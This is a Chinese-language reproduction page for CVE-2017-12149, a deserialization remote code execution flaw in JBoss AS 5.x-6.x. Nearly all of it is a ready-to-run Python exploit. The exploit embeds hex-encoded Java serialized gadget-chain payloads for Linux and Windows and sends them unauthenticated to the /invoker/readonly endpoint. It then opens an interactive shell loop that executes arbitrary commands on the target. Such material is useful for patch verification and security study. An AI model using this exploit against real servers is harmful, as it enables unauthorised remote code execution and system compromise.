(CVE-2017-12149)JBosS AS 6.X 反序列化漏洞
一、漏洞简介
JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。
二、漏洞影响
JBoss 5.x - 6.x
三、复现过程
poc
cve-2017-12149_cmd.py
#!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
import binascii
import sys
import re
if len(sys.argv)!=2:
print('+---------------------------------------------------------------+')
print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +')
print('+ as https://github.com/1337g/CVE-2017-10271 +')
print('+---------------------------------------------------------------+')
print('+ USE: python <filename> <url> +')
print('+ EXP: python cve-2017-12149_cmd.py http://freeerror.org:8080 +')
print('+ VER: Jboss AS 5.X +')
print('+ Jboss AS 6.X +')
print('+---------------------------------------------------------------+')
sys.exit()
url_in = sys.argv[1]
linux_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000" "7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f" "6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279" "8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563" "743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372" "002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" "2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267" "2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72" "6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374" "696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec" "287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163" "68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78" "707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e" "732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f" "72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009" "69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173" "734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63" "6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254" "72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61" "76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176" "612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176" "612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563" "743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43" "6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574" "2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275" "71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00" "18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a" "fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479" "71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74" "6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400052f74" "6d702f74000074000466696c65707874000b6e6577496e7374616e63657571007e001a00" "0000017671007e00187371007e00137571007e00180000000174000e52756e436865636b" "436f6e6669677400096c6f6164436c6173737571007e001a00000001767200106a617661" "2e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00" "18000000017571007e001a0000000171007e003371007e001e7571007e001a0000000171" "007e00207371007e00137571007e001800000001757200135b4c6a6176612e6c616e672e" "537472696e673badd256e7e91d7b470200007870000000017400"
win_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000" "7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f" "6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279" "8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563" "743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372" "002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" "2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267" "2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72" "6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374" "696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec" "287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163" "68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78" "707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e" "732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f" "72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009" "69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173" "734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63" "6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254" "72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61" "76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176" "612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176" "612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563" "743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43" "6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574" "2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275" "71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00" "18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a" "fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479" "71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74" "6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400112f63" "3a2f77696e646f77732f74656d702f74000074000466696c65707874000b6e6577496e73" "74616e63657571007e001a000000017671007e00187371007e00137571007e0018000000" "0174000e52756e436865636b436f6e6669677400096c6f6164436c6173737571007e001a" "00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078" "707371007e00137571007e0018000000017571007e001a0000000171007e003371007e00" "1e7571007e001a0000000171007e00207371007e00137571007e00180000000175720013" "5b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001" "7400"
payload_2 = "71007e002a7571007e001a0000000171007e002c737200116a6176612e7574696c2e48617" "3684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573" "686f6c6478703f4000000000000077080000001000000000787878"
payload_other = ""
os_type = "unknown"
def build_command_hex(command):
command_exec_hex = "".join("{:02x}".format(ord(c)) for c in command)
command_len = len(command)
command_len_hex = '{:02x}'.format(command_len)
command_hex = command_len_hex + command_exec_hex
return command_hex
def build_payload(target_os, command):
global os_type
if os_type == "unknown":
if target_os == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if target_os == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
if os_type == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if os_type == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
return payload
def do_post(payload):
payload_url = url_in + "/invoker/readonly"
result = requests.post(payload_url, payload, verify=False)
result_content = str(result.content)
return result_content
def check_OS():
global os_type
payload_linux = build_payload('linux','whoami')
payload_win = build_payload('windows','whoami')
linux_re = do_post(payload_linux)
win_re = do_post(payload_win)
if "[L291919]" in linux_re:
os_type = 'linux'
if "[W291013]" in win_re:
os_type = 'windows'
return os_type
def run_command(command_in):
payload = build_payload(os_type,command_in)
result = do_post(payload)
result = re.findall ( '](.*?)RunCheckConfig',result, re.DOTALL)
if len(result) == 0:
result.append("command error!\n")
command_callback = result[0]
return command_callback
check_OS()
if os_type =="unknown":
print "[*] Unknown System"
exit(0)
print "***************************************************** \n" "* Target system is " + os_type + " OS * \n" "***************************************************** \n"
while 1:
command_in = raw_input("Shell >>> ")
if command_in == "exit" : exit(0)
print run_command(command_in).decode('utf-8')